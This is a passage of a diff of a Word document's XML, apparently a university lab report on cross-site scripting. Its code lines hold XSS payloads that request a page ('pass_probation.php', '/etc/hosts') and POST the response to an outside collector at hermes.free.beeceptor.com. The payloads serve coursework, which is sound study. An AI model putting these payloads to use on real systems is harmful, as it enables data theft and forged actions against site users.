+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  var xhr = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  xhr.onload = function () {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    var xhr2 = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    xhr2.send("test=" +</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
@@ -15909,17 +14391,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xss</w:t>
-            </w:r>
-            <w:r>
+              <w:t>this.responseText);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>_1</w:t>
-            </w:r>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -15927,7 +14410,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>.html --&gt;</w:t>
+              <w:t xml:space="preserve">  };</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15946,7 +14429,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;script&gt;</w:t>
+              <w:t xml:space="preserve">  xhr.open("GET", "http://assignment-hermes.unimelb.life/pass_probation.php?user=xiandew");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -15965,319 +14448,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.onload</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = function () {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    var xhr2 = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.send("test=" +</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>this.responseText</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  };</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.open</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>("GET", "http://assignment-hermes.unimelb.life/pass_probation.php?user=xiandew");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.send</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>();</w:t>
+              <w:t xml:space="preserve">  xhr.send();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -16378,21 +14549,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>the user “</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xiandew</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>”</w:t>
+              <w:t>the user “xiandew”</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -16800,7 +14957,6 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New" w:hint="eastAsia"/>
@@ -16817,9 +14973,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>!--</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t xml:space="preserve">!-- </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16827,56 +14982,56 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
+              <w:t>xxs_2.html --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xxs_2.html --&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;script&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t xml:space="preserve">  var xhr = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16884,20 +15039,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">  xhr.onload = function () {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16905,19 +15058,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+              <w:t xml:space="preserve">    var xhr2 = new XMLHttpRequest();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16925,7 +15077,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>);</w:t>
+              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -16944,21 +15096,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
+              <w:t xml:space="preserve">    xhr2.send("test=" + this.responseText);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>xhr.onload</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -16966,7 +15115,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> = function () {</w:t>
+              <w:t xml:space="preserve">  };</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -16985,20 +15134,18 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    var xhr2 = new </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
+              <w:t xml:space="preserve">  xhr.open("GET", "/etc/hosts");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>XMLHttpRequest</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -17006,178 +15153,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    xhr2.send("test=" + </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>this.responseText</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  };</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>xhr.open</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>("GET", "/etc/hosts");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
